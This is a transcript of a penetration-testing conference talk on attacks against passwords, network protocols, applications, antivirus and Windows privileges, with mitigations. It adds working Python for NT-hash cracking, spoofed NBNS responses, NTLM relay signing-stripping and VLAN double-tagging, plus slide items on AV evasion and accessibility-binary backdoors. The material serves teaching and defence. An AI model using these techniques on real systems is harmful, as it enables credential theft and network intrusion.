Attack All the Layers (Secure 360)
DESCRIPTION
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. Vulnerabilities related to the application, network, and server layers will be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks. Karl Fosaaen and I put this together for Secure 360 in Minneapolis. We hope you enjoy it. More security blogs by the authors can be found @ https://www.netspi.com/blog/
TRANSCRIPT
INTRODUCTIONS
Scott Sutherland
Security Consultant @ NetSPI
Twitter: @_nullbind
Karl Fosaaen
Security Consultant @ NetSPI
Twitter: @kfosaaen
We specialize in both things and stuff!
OVERVIEW
• Why do companies pen test?
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Windows Escalation
• Conclusions
WHY DO COMPANIES PEN TEST?
• Compliance requirements
• Third party requests
• Identify unknown security gaps
• Validate existing security controls
• Prioritize existing security initiatives
• Prevent data breaches
PENETRATION TEST GOALS
• Identify and understand the impact of vulnerabilities at the application, system, and network layers
• Prioritize remediation
• Understand ability to detect and respond to attacks
PENETRATION TEST OBJECTIVES
• *Complete client specific objectives
• Gain access to critical systems, sensitive data, and application functionality
• Attack Surfaces: Applications, Networks, Servers
• Attack Categories: Configuration issues, Code vulnerabilities, Missing patches
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Escalation
ATTACKING PASSWORDS
• Dictionary Attacks
• Dump Hashes and Crack
• Dump Hashes and PTH
• Impersonate
• Dump in Cleartext!
ATTACKING PASSWORDS
(Timeline slide: 1997, 2000s, 2001, 2007, 2008, 2010, 2012)
ATTACKING PASSWORDS: DICTIONARY
• Dictionary Attacks
- Enumerate users: null SMB logins, RPC, *SID brute force, SNMP, LDAP, SharePoint, etc.
- Attack!
• Are users getting smarter? Sort of…
- “Spring2013” meets password complexity requirements
ATTACKING PASSWORDS: CRACKING
• Dumping Hashes and Cracking
- John
- Rainbow Tables
- oclHashcat-plus
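As an added example (not from the slides or from NetSPI's tooling), the following Python ties the dictionary and cracking slides together: an NT hash is an unsalted MD4 over the UTF-16LE password, so a pwdump line can be tested against a wordlist at memory speed, and a Season+Year candidate generator shows why “Spring2013” both passes the default Windows complexity rule and falls in seconds. MD4 is implemented inline because OpenSSL 3 no longer exposes it to hashlib by default. The sample dump, account names, the simplified complexity check and the candidate mangling rules are all constructed for the example.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# (mixing function, additive constant, per-step shifts, message-word order) for each MD4 round
_ROUNDS = (
    (_f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
    (_g, 0x5A827999, (3, 5, 9, 13), tuple((i % 4) * 4 + i // 4 for i in range(16))),
    (_h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (OpenSSL 3 ships MD4 only as a legacy algorithm)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for fn, k, shifts, order in _ROUNDS:
            for i in range(16):
                t = (4 - i % 4) % 4  # target register cycles a, d, c, b
                p, q, r = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + fn(p, q, r) + x[order[i]] + k) & MASK32, shifts[i % 4])
        state = [(s + w) & MASK32 for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """Windows NT hash: unsalted MD4 of the UTF-16LE password, hex encoded."""
    return md4(password.encode("utf-16-le")).hex()


def meets_complexity(password: str, username: str) -> bool:
    """Simplified default Windows complexity rule: 6+ chars, 3 of the 4 classes
    (upper, lower, digit, other) and not containing the account name."""
    classes = (
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),
    )
    return len(password) >= 6 and sum(classes) >= 3 and username.lower() not in password.lower()


def season_candidates(years):
    """Season+Year pattern passwords with the usual mangling (constructed rule set)."""
    for year in years:
        for season in ("Spring", "Summer", "Fall", "Autumn", "Winter"):
            yield from (f"{season}{year}", f"{season}{year}!",
                        f"{season}{str(year)[2:]}", f"{season.lower()}{year}")


def crack_pwdump(pwdump_lines, candidates):
    """Match pwdump-format lines (user:rid:lmhash:nthash:::) against candidate passwords."""
    by_hash = {}
    for line in pwdump_lines:
        user, _rid, _lm, nt = line.split(":")[:4]
        by_hash.setdefault(nt.lower(), []).append(user)
    found = {}
    for word in candidates:
        for user in by_hash.get(nt_hash(word), []):
            found[user] = word
    return found


# Constructed sample dump: LM field is the 'no LM hash' constant, NT hashes come from nt_hash() above.
NO_LM = "aad3b435b51404eeaad3b435b51404ee"
SAMPLE_DUMP = [
    f"Administrator:500:{NO_LM}:{nt_hash('password')}:::",
    f"jsmith:1104:{NO_LM}:{nt_hash('Spring2013')}:::",
    f"svc_backup:1105:{NO_LM}:{nt_hash('Tr0ub4dor&3')}:::",
]

if __name__ == "__main__":
    wordlist = ["password", "Password1"] + list(season_candidates(range(2011, 2014)))
    for user, pw in crack_pwdump(SAMPLE_DUMP, wordlist).items():
        print(f"{user}: {pw} (passes complexity policy: {meets_complexity(pw, user)})")
```

The point of the run is the last column: “Spring2013” satisfies the policy and is still the second thing any wordlist tries, which is why the real fix is length and spraying detection, not more complexity rules.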
ATTACKING PASSWORDS: PASSING
• Dumping and Passing Hashes
- Pass-The-Hash Toolkit
- Metasploit
- PTH everything
ATTACKING PASSWORDS: IMPERSONATE
• Impersonate
- Incognito
- WCE
ATTACKING PASSWORDS: CLEARTEXT
• Dump in Cleartext! All the applications!
- Egyp7’s script
- WCE
- Mimikatz
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Windows Escalation
ATTACKING PROTOCOLS
• ARP: Address Resolution Protocol
• NBNS: NetBIOS Name Service
• SMB: Server Message Block
• DTP: Dynamic Trunking Protocol
• VTP: VLAN Trunking Protocol
• Honorable Mentions
ATTACKING PROTOCOLS: ARP
Address Resolution Protocol
ATTACKING PROTOCOLS: ARP
• General: MAC-to-IP association, Layer 2
• Conditions: Independent of user action, Broadcast network
• Attacks: MITM monitoring, MITM injection, DoS
Common ARP MITM attacks:
• Intercept Data
- SSN, credit cards, healthcare data, etc.
- Whole file parsing with NetworkMiner
• Intercept Passwords
- Cain will parse passwords for over 30 protocols
• Inject Content
- SQL injection: web and direct database connections
- HTML injection: redirection, browser exploits
- UNC path injection: force authentication
- Proxy and modify HTTP traffic with Burp Suite
ATTACKING PROTOCOLS: ARP
Common ARP MITM tools:
• Windows Tools: Cain, Ettercap-NG, Intercepter-NG, Nemesis
• Linux Tools: Ettercap, Dsniff, Subterfuge, Easy-Creds, Loki, Nemesis
ATTACKING PROTOCOLS: ARP
Common mitigating controls:
• Dynamic ARP Inspection
• Port Security
• Static ARP entries (not recommended; does not scale)
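An added detection-side example (editor's code, not from the slides or any of the tools listed): the poisoning described above shows up in a capture as ARP replies nobody requested and as a gateway IP that suddenly “moves” to a different MAC. The frames below are constructed inline; the parser works on raw Ethernet II + ARP bytes, so the same function can be fed frames read from a pcap. MAC and IP values are invented for the example.

```python
import struct

BROADCAST = b"\xff" * 6
ZERO_MAC = b"\x00" * 6


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II + ARP (op 1 = request, 2 = reply). Requests go to the broadcast MAC."""
    eth_dst = BROADCAST if op == 1 else target_mac
    eth = eth_dst + sender_mac + b"\x08\x06"                  # dst, src, EtherType ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)          # Ethernet, IPv4, hlen, plen, op
    arp += sender_mac + bytes(map(int, sender_ip.split(".")))
    arp += target_mac + bytes(map(int, target_ip.split(".")))
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_ip) or None for non-ARP frames."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    sender_mac = frame[22:28].hex(":")
    sender_ip = ".".join(str(b) for b in frame[28:32])
    target_ip = ".".join(str(b) for b in frame[38:42])
    return op, sender_mac, sender_ip, target_ip


def detect_poisoning(frames):
    """Replay frames in order. Flag replies nobody asked for and replies that move an IP to a new MAC.
    Gratuitous ARP from a legitimate host also trips the first rule, which is why switches
    (Dynamic ARP Inspection) validate against DHCP snooping bindings instead of request history."""
    binding, pending, alerts = {}, set(), []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        op, smac, sip, tip = parsed
        if op == 1:
            pending.add(tip)                 # someone wants to know who owns tip
            binding.setdefault(sip, smac)    # the asker announces its own binding too
        elif op == 2:
            if sip in pending:
                pending.discard(sip)
            else:
                alerts.append(f"unsolicited reply: {sip} is-at {smac}")
            old = binding.get(sip)
            if old is not None and old != smac:
                alerts.append(f"binding change: {sip} moved from {old} to {smac}")
            binding[sip] = smac
    return binding, alerts


# Constructed capture: the victim asks for the gateway, the gateway answers, then an attacker
# keeps sending spoofed replies so the victim's cache points the gateway IP at the attacker.
GATEWAY_MAC, VICTIM_MAC, ATTACKER_MAC = b"\xaa" * 6, b"\xbb" * 6, b"\xcc" * 6
SAMPLE_FRAMES = [
    build_arp(1, VICTIM_MAC, "10.0.0.50", ZERO_MAC, "10.0.0.1"),
    build_arp(2, GATEWAY_MAC, "10.0.0.1", VICTIM_MAC, "10.0.0.50"),
    build_arp(2, ATTACKER_MAC, "10.0.0.1", VICTIM_MAC, "10.0.0.50"),
    build_arp(2, ATTACKER_MAC, "10.0.0.1", VICTIM_MAC, "10.0.0.50"),
]

if __name__ == "__main__":
    table, findings = detect_poisoning(SAMPLE_FRAMES)
    print(table)
    print("\n".join(findings))
```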
ATTACKING PROTOCOLS: NBNS
NetBIOS Name Service
ATTACKING PROTOCOLS: NBNS
• General: hostname-to-IP resolution, Layer 5 / 7
• Constraints: Dependent on user action, Broadcast network, Windows only
• Attacks: MITM monitoring, MITM injection, DoS
Common NBNS MITM attacks:
• Intercept Data
- SSN, credit cards, healthcare data, etc.
- Whole file parsing with NetworkMiner
• Intercept Passwords
- Cain will parse passwords for over 30 protocols
• Inject Content
- SQL injection: web and direct database connections
- HTML injection: redirection, browser exploits
- UNC path injection: force authentication
- Proxy and modify traffic with Burp Suite
ATTACKING PROTOCOLS: NBNS
Common NBNS MITM tools:
• Windows Tools: nbnspoof (python), Metasploit (nbns_response + other modules), Responder (python)
• Linux Tools: nbnspoof (python), Metasploit (nbns_response + other modules), Responder (python)
ATTACKING PROTOCOLS: NBNS
Common mitigating controls:
• Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS
• Disable NBNS (not highly recommended)
• Disable insecure authentication (LM/NTLMv1) to help limit the impact of exposed hashes
• Enable packet signing to help prevent SMB Relay attacks
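The exchange behind the NBNS slides, as an added example (editor's code, not Responder or nbnspoof): a Windows host that cannot resolve a name through DNS broadcasts a NetBIOS name query, and whoever answers first wins. The code builds the query exactly as the victim would send it, parses it, and builds the positive response a spoofer sends back pointing at its own IP. The NetBIOS first-level name encoding (each byte of the space-padded 16-byte name becomes two letters, 'A' + nibble) is the part most people get wrong, so it is shown explicitly and checked on the WPAD name that makes the DNS-entry mitigation above matter. Transaction IDs, names and IPs are constructed.

```python
import struct

NB_TYPE, IN_CLASS = 0x0020, 0x0001


def encode_netbios_name(name, suffix=0x00):
    """First-level encoding: pad to 15 chars, append the suffix byte, emit each nibble as 'A'+nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return "".join(chr(65 + (b >> 4)) + chr(65 + (b & 0xF)) for b in raw)


def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name: returns (name, suffix)."""
    raw = bytes(((ord(encoded[i]) - 65) << 4) | (ord(encoded[i + 1]) - 65) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def build_query(txid, name, suffix=0x00):
    """NAME QUERY REQUEST as broadcast by a Windows host: flags = RD + B (broadcast), one question."""
    header = struct.pack("!HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    qname = b"\x20" + encode_netbios_name(name, suffix).encode("ascii") + b"\x00"
    return header + qname + struct.pack("!HH", NB_TYPE, IN_CLASS)


def parse_query(pkt):
    """Return (txid, name, suffix) for a query, None for anything else."""
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1 or len(pkt) < 50 or pkt[12] != 0x20:
        return None
    name, suffix = decode_netbios_name(pkt[13:45].decode("ascii"))
    return txid, name, suffix


def build_poisoned_response(query, answer_ip, ttl=165):
    """Answer any query with our IP: positive NAME QUERY RESPONSE (QR, AA, RD set), one NB record."""
    parsed = parse_query(query)
    if parsed is None:
        return None
    header = struct.pack("!HHHHHH", parsed[0], 0x8500, 0, 1, 0, 0)
    rr_name = query[12:46]                                    # echo the 34-byte encoded question name
    rdata = struct.pack("!H", 0x0000) + bytes(map(int, answer_ip.split(".")))  # NB_FLAGS: unique, B-node
    return header + rr_name + struct.pack("!HHIH", NB_TYPE, IN_CLASS, ttl, len(rdata)) + rdata


def parse_response(pkt):
    """Return (txid, name, ip) from a NAME QUERY RESPONSE, None if it is not one."""
    txid, flags, _qd, ancount = struct.unpack("!HHHH", pkt[:8])
    if not flags & 0x8000 or ancount != 1:
        return None
    name, _suffix = decode_netbios_name(pkt[13:45].decode("ascii"))
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[46:56])
    if rtype != NB_TYPE or rdlen != 6:
        return None
    return txid, name, ".".join(str(b) for b in pkt[58:62])


if __name__ == "__main__":
    # Constructed exchange: a user mistypes a server name, DNS fails, the host falls back to NBNS.
    victim_query = build_query(0x1234, "FILESRVER")
    spoof = build_poisoned_response(victim_query, "10.0.0.66")   # attacker's IP, constructed
    print(parse_query(victim_query), parse_response(spoof))
    print("WPAD encodes as", encode_netbios_name("WPAD"))
```

Once the victim has the spoofed answer it opens SMB (or HTTP for WPAD) to 10.0.0.66 and authenticates with NTLM, which is where the hash capture and SMB relay on the following slides start.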
ATTACKING PROTOCOLS: SMB
Server Message Block
ATTACKING PROTOCOLS: SMB
• General: SMB is the comeback kid! Layer 7
• Constraints: Dependent on user action, Any routable network, No relaying back to the originating host
• Attacks: Command execution, Shells…aaand shells
Historically SMB Relay has been used to:
• Execute arbitrary commands
• Obtain shells
Lately the community has been developing tools for doing things like:
• LDAP queries
• SQL queries
• Exchange services
• Mounting file systems
ATTACKING PROTOCOLS: SMB
Many tools support SMB Relay attacks:
• Windows Tools: Metasploit (smb_relay and http_ntlmrelay), Intercepter-NG …this is kind of a pain in Windows
• Linux Tools: Metasploit (smb_relay and http_ntlmrelay), ZackAttack, Subterfuge, Squirtle
ATTACKING PROTOCOLS: SMB
Common mitigating controls:
• Enable packet signing to help prevent SMB Relay attacks
• Apply really old patches (if you missed out on the last decade…)
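An added example of why “enable packet signing” is the mitigation on this slide (editor's code, not Metasploit or any of the relay tools above): a relay sits between a victim and a target and forwards the three NTLM messages unchanged except for one thing, the signing flags in the client's NEGOTIATE, which it clears so the target agrees to an unsigned session. A target that merely supports signing goes along with that; a target that requires signing insists on it, and the relay cannot produce valid signatures because it never learns the session key. The message layouts follow MS-NLMP (type 1 and type 2 without the optional Version field); the server policy function is a deliberate simplification, and the names, flags and challenge bytes are constructed.

```python
import struct

NTLMSSP = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001
REQUEST_TARGET = 0x00000004
NEGOTIATE_SIGN = 0x00000010
NEGOTIATE_NTLM = 0x00000200
NEGOTIATE_ALWAYS_SIGN = 0x00008000
TARGET_TYPE_DOMAIN = 0x00010000
NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000
NEGOTIATE_128 = 0x20000000
SIGNING_FLAGS = NEGOTIATE_SIGN | NEGOTIATE_ALWAYS_SIGN


def build_negotiate(flags, domain=b"", workstation=b""):
    """NEGOTIATE_MESSAGE (type 1): 32-byte header, then OEM domain/workstation payload."""
    d_fields = struct.pack("<HHI", len(domain), len(domain), 32)
    w_fields = struct.pack("<HHI", len(workstation), len(workstation), 32 + len(domain))
    return NTLMSSP + struct.pack("<II", 1, flags) + d_fields + w_fields + domain + workstation


def parse_negotiate(msg):
    if msg[:8] != NTLMSSP or struct.unpack("<I", msg[8:12])[0] != 1:
        raise ValueError("not an NTLM NEGOTIATE message")
    return struct.unpack("<I", msg[12:16])[0]


def strip_signing(msg):
    """Relay trick: clear the signing flags in the client's NEGOTIATE before forwarding it,
    so a target that does not *require* signing negotiates an unsigned session."""
    flags = parse_negotiate(msg) & ~SIGNING_FLAGS & 0xFFFFFFFF
    return msg[:12] + struct.pack("<I", flags) + msg[16:]


def build_challenge(flags, target, challenge):
    """CHALLENGE_MESSAGE (type 2) without the optional Version field: 48-byte header."""
    tname = target.encode("utf-16-le")
    t_fields = struct.pack("<HHI", len(tname), len(tname), 48)
    ti_fields = struct.pack("<HHI", 0, 0, 48 + len(tname))
    return (NTLMSSP + struct.pack("<I", 2) + t_fields + struct.pack("<I", flags)
            + challenge + b"\x00" * 8 + ti_fields + tname)


def parse_challenge(msg):
    """Return (target name, negotiated flags, 8-byte server challenge)."""
    if msg[:8] != NTLMSSP or struct.unpack("<I", msg[8:12])[0] != 2:
        raise ValueError("not an NTLM CHALLENGE message")
    tlen, _tmax, toff = struct.unpack("<HHI", msg[12:20])
    flags = struct.unpack("<I", msg[20:24])[0]
    return msg[toff:toff + tlen].decode("utf-16-le"), flags, msg[24:32]


def server_answer(client_flags, require_signing, target, challenge):
    """Simplified target policy (assumption for the example): a server that requires signing
    sets the signing flags regardless of the client; one that merely supports it mirrors the client."""
    flags = (client_flags & ~SIGNING_FLAGS) | TARGET_TYPE_DOMAIN | REQUEST_TARGET
    if require_signing or client_flags & SIGNING_FLAGS:
        flags |= SIGNING_FLAGS
    return build_challenge(flags, target, challenge)


def relay_session_unsigned(client_negotiate, require_signing, challenge=b"\x11" * 8):
    """Forward a stripped NEGOTIATE to the target; True if the target agreed to an unsigned session."""
    forwarded = strip_signing(client_negotiate)
    reply = server_answer(parse_negotiate(forwarded), require_signing, "CORP", challenge)
    _target, server_flags, _chal = parse_challenge(reply)
    return not server_flags & SIGNING_FLAGS


if __name__ == "__main__":
    client = build_negotiate(NEGOTIATE_UNICODE | REQUEST_TARGET | NEGOTIATE_NTLM
                             | NEGOTIATE_EXTENDED_SESSIONSECURITY | NEGOTIATE_128 | SIGNING_FLAGS,
                             b"CORP", b"WS01")
    print("target that only supports signing, relayed session unsigned:", relay_session_unsigned(client, False))
    print("target that requires signing, relayed session unsigned:     ", relay_session_unsigned(client, True))
```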
ATTACKING PROTOCOLS: DTP
Dynamic Trunking Protocol
ATTACKING PROTOCOLS: DTP
• General: 802.1Q encapsulation is in use, Layer 2
• Constraints: Independent of user action; trunking is set to enabled or auto on the switch port
• Attacks: Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default; *Full VLAN hopping
• Intercept Data
SSN, Credit Cards, Healthcare data, etc
Whole file parsing with NetworkMiner
• Intercept Passwords
Cain will parse passwords for over 30 protocols
ATTACKING PROTOCOLS: DTP
Common DTP spoofing tools:
• Windows Tools
I got nothing…
• Linux Tools
Yersinia
ATTACKING PROTOCOLS: DTP
Common mitigating controls:
• Use a dedicated, otherwise unused VLAN ID as the native VLAN on all trunk ports
• Disable all unused ports and place them on a non-routable VLAN
• Configure all user ports as access ports (DTP off) to prevent trunk negotiation
• Tag native VLAN traffic on trunks so double-tagged frames (two 802.1Q headers) cannot hop VLANs
• Configure strong VACLs
ATTACKING PROTOCOLS: VTP
VLAN Trunking Protocol
ATTACKING PROTOCOLS: VTP
• General: 802.1Q encapsulation is in use, Layer 2
• Constraints: Independent of user action; VLANs are IP or MAC based
• Attacks: Ability to directly attack systems on other VLANs
Common next steps after 802.1Q tag forgery (VLAN hopping):
• MITM attacks against remote VLAN systems
• Intercept/Modify Data: usually limited to broadcast traffic (unless MITM)
ATTACKING PROTOCOLS: VTP
Tools for VLAN hopping attacks:
• Windows Tools
Native: manually reconfigure the VLAN ID via the adapter's TCP/IP settings
• Linux Tools
Native: modprobe (8021q) + ifconfig
VoIP Hopper
Yersinia
ATTACKING PROTOCOLS: VTP
Common mitigating controls:
• Use a dedicated, otherwise unused VLAN ID as the native VLAN on all trunk ports
• Disable all unused ports and place them on a non-routable VLAN
• Configure all user ports as access ports (DTP off) to prevent trunk negotiation
• Tag native VLAN traffic on trunks so double-tagged frames (two 802.1Q headers) cannot hop VLANs
• Configure strong VACLs
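The double-tagging hop that the DTP and VTP mitigation slides are defending against, as an added example (editor's code, not Yersinia or VoIP Hopper): the attacker's frame carries two 802.1Q tags, outer = the trunk's native VLAN, inner = the VLAN it wants to reach. The first switch strips the outer tag and, because native-VLAN traffic leaves a trunk untagged, sends the frame across with the inner tag now exposed; the far switch reads that tag and delivers into the target VLAN. The simulated switch below is a simplified model of that behaviour (an assumption for the example, not a description of any vendor's implementation); it is used to show that either tagging the native VLAN or moving the native VLAN to an unused ID stops the hop. The frame bytes are constructed.

```python
import struct

TPID_8021Q = b"\x81\x00"


def add_vlan_tag(frame, vid, pcp=0):
    """Insert an 802.1Q tag (TPID 0x8100 + TCI) after the destination/source MAC pair."""
    tci = (pcp << 13) | (vid & 0x0FFF)
    return frame[:12] + TPID_8021Q + struct.pack("!H", tci) + frame[12:]


def vlan_tags(frame):
    """VLAN IDs present on the frame, outermost first."""
    tags, off = [], 12
    while frame[off:off + 2] == TPID_8021Q:
        tags.append(struct.unpack("!H", frame[off + 2:off + 4])[0] & 0x0FFF)
        off += 4
    return tags


def pop_outer_tag(frame):
    return frame[:12] + frame[16:]


def access_in_trunk_out(frame, port_vid, native_vid, tag_native):
    """Simplified switch: frame enters an access port and leaves on an 802.1Q trunk.
    Ingress: a tagged frame is accepted only if the tag matches the port VLAN; that tag is consumed.
    Egress: the frame is tagged with its VLAN, except that native-VLAN traffic leaves untagged
    unless the trunk is configured to tag the native VLAN."""
    tags = vlan_tags(frame)
    if tags:
        if tags[0] != port_vid:
            return None  # dropped by the ingress VLAN check
        frame = pop_outer_tag(frame)
    if port_vid == native_vid and not tag_native:
        return frame  # leaves untagged; any remaining inner tag is now the outer tag
    return add_vlan_tag(frame, port_vid)


def trunk_in(frame, native_vid):
    """Receiving switch: untagged frames belong to the native VLAN, tagged frames to their VID."""
    tags = vlan_tags(frame)
    if not tags:
        return native_vid, frame
    return tags[0], pop_outer_tag(frame)


def landing_vlan(attacker_frame, port_vid, native_vid, tag_native):
    """VLAN in which the far-side switch delivers the attacker's frame, or None if it was dropped."""
    on_wire = access_in_trunk_out(attacker_frame, port_vid, native_vid, tag_native)
    return None if on_wire is None else trunk_in(on_wire, native_vid)[0]


# Constructed frame: dst/src MACs, EtherType IPv4, dummy payload; the attacker double-tags it
# with outer VID 1 (the default native VLAN) and inner VID 20 (the VLAN it wants to reach).
BASE_FRAME = b"\xff" * 6 + b"\xcc" * 6 + b"\x08\x00" + b"payload"
ATTACK_FRAME = add_vlan_tag(add_vlan_tag(BASE_FRAME, 20), 1)

if __name__ == "__main__":
    print("default native VLAN 1, untagged:", landing_vlan(ATTACK_FRAME, 1, 1, False))    # 20: hop
    print("native VLAN tagged on the trunk:", landing_vlan(ATTACK_FRAME, 1, 1, True))     # 1: no hop
    print("dedicated unused native VLAN:   ", landing_vlan(ATTACK_FRAME, 1, 999, False))  # 1: no hop
```

Note the hop is one-way: the target in VLAN 20 replies into its own VLAN, so double tagging is useful for blind injection and DoS, and the MITM cases on this slide need the attacker to actually get a foot in the remote VLAN.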
ATTACKING PROTOCOLS: OTHERS
Honorable Mention:
• Preboot Execution Environment (PXE)
• Link-local Multicast Name Resolution (LLMNR)
• Dynamic Host Configuration Protocol (DHCP)
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Windows Escalation
ATTACKING APPLICATIONS
• Default and weak passwords for everything. Tools: Nmap, Nessus, Web Scour, manuals, Google
• SQL injection. Tools: manually, web scanners, SQL Ninja, SQLMap, Metasploit
• RFI / web shells (JBoss, Tomcat, etc.). Tools: Metasploit, FuzzDB, and other web shellery
• Web directory traversals. Tools: manually, web scanners, FuzzDB, Metasploit
• MS08-067. Tools: Metasploit, Exploit-DB exploits, etc.
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Escalation
BYPASSING AV
• Weak Configurations
• Source Code Tricks
• Binary Modifications
• Process/Thread Manipulation
BYPASSING AV: WEAK CONFIGURATIONS
• Execute from share, UNC path, or external media
• Disable via GUI
• Create policy exceptions
• Kill processes
• Stop / Disable Services
• Uninstall (not recommended)
• Insecure service registration (unquoted path: c:\program.exe)
• Insecure file permissions (file replacement/mods)
• Execute from a DLL
• DLL preloading, side loading, etc.
• GAC poisoning (potentially)
BYPASSING AV: SOURCE CODE TRICKS
Customize everything…and be crazy
• Migrate to and suspend or kill AV
• Modify comments (web languages)
• Replace variable names
• Modify application logic
• Use alternative functions
• Remove or modify resources
• Encode or encrypt payloads
• Compress payloads
• Add time delays
• Call NTDLL.DLL directly
BYPASSING AV: BINARY MODIFICATIONS
Same idea…be crazy
• Simple string modification
• Decompile/modify source
• Disassemble / modify application logic
• Disassemble /insert time delays
• Modify resource table (Ditto / CFF Explorer)
• Modify imports table (Ditto / CFF Explorer)
• Pack (UPX, MPRESS, IExpress, etc.)
• Metasploit Pro payloads: dynamic EXE generation
BYPASSING AV: PROCESS/THREAD MODS
Inject, inject, replace…
• Code injection (local and remote)
• DLL injection (local and remote)
• Process replacement
Common Tools:
• PowerShell: PowerSploit, etc.
• Python and Py2exe
• Any language that supports calls to native DLLs
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Windows Escalation
WINDOWS ESCALATION: OVERVIEW
• Local user → Local Administrator
• Domain user → Local Administrator
• Local Administrator → LocalSystem
• LocalSystem → Domain User
• Locate Domain Admin Tokens
• LocalSystem → Domain Admin
WINDOWS ESCALATION: LOCAL ADMIN
• Local user → Local Administrator
- Excessive local group privileges (Administrators or Power Users)
- Cleartext credentials
  • Sysprep (unattend.xml/ini/txt)
  • Config files, scripts, logs, desktop folders
  • Tech support call files
- Weak application configurations that allow:
  • Restarting or reconfiguring services
  • Replacing application files
  • DLL preloading or side loading
  • Executable injection via poorly registered services: C:\Program Files (x86) vs “C:\Program Files (x86)” (unquoted service path)
- Local and remote exploits (Metasploit: getsystem)
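The “poorly registered services” item above, and the “insecure service registration (c:\program.exe)” item on the AV slide, both come down to one rule: when a service ImagePath is not quoted and contains spaces, CreateProcess tries each space-delimited prefix as the program name before it reaches the real binary. The added example below (editor's code, not a NetSPI tool) lists those candidate paths for an inventory of services and crosses them with the directories the current user can write to; on a real host the inventory comes from the registry or `sc qc` and the writable set from icacls / Get-Acl, here both are constructed.

```python
import ntpath
import re


def hijack_candidates(image_path):
    """For an unquoted ImagePath containing spaces, list the executables CreateProcess would try,
    in order, before reaching the intended binary (each space is a possible end of the program name)."""
    path = image_path.strip()
    if path.startswith('"'):
        return []  # properly quoted: no ambiguity
    m = re.match(r"^(.*?\.exe)(\s|$)", path, re.IGNORECASE)
    if not m:
        return []
    parts = m.group(1).split(" ")  # the binary path without its arguments
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def find_service_hijacks(services, writable_dirs):
    """services: (name, ImagePath, account) tuples as read from the registry or 'sc qc'.
    writable_dirs: directories the current user can create files in.
    Returns (service, account, path to plant) for every candidate in a writable directory."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    hits = []
    for name, image_path, account in services:
        for candidate in hijack_candidates(image_path):
            if ntpath.dirname(candidate).lower().rstrip("\\") in writable:
                hits.append((name, account, candidate))
    return hits


# Constructed inventory and ACL result; paths are examples, not findings from any real host.
SERVICES = [
    ("VulnSvc", "C:\\Program Files (x86)\\Acme Agent\\bin\\agent.exe -k netsvc", "LocalSystem"),
    ("GoodSvc", '"C:\\Program Files\\Good Vendor\\svc.exe"', "LocalSystem"),
    ("Spooler", "C:\\Windows\\System32\\spoolsv.exe", "LocalSystem"),
]
WRITABLE = ["C:\\Program Files (x86)"]  # assumed loosened by a vendor installer, for the example

if __name__ == "__main__":
    for svc, acct, drop in find_service_hijacks(SERVICES, WRITABLE):
        print(f"{svc} runs as {acct}: plant {drop}, then restart the service")
```

The candidate list is also the remediation checklist: quote the path, or make sure none of the prefix directories is writable by unprivileged users.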
WINDOWS ESCALATION: LOCAL ADMIN
• Domain user → Local Administrator
- Issues from the last slide and…
- Group Policy Preferences: groups.xml
- File shares accessible to domain users
- Ability to log into domain workstations
- Excessive database privileges (xp_cmdshell, etc.)
- SMB Relay + cracking hashes
- Other systems and applications that use integrated domain authentication…
WINDOWS ESCALATION: LOCAL ADMIN
• Local Administrator → LocalSystem
- At.exe (on older systems) – we still see it!
- Accessibility options
  • Replace accessibility binaries like utilman.exe, osk.exe and sethc.exe with cmd.exe or another backdoor
- Create a custom service to run as LocalSystem
  • psexec -s -i cmd.exe
- Migrate to a system process
  • Remote process injection, MSF ps + migrate, and Incognito
- Local and remote exploits
  • Metasploit: getsystem, etc.
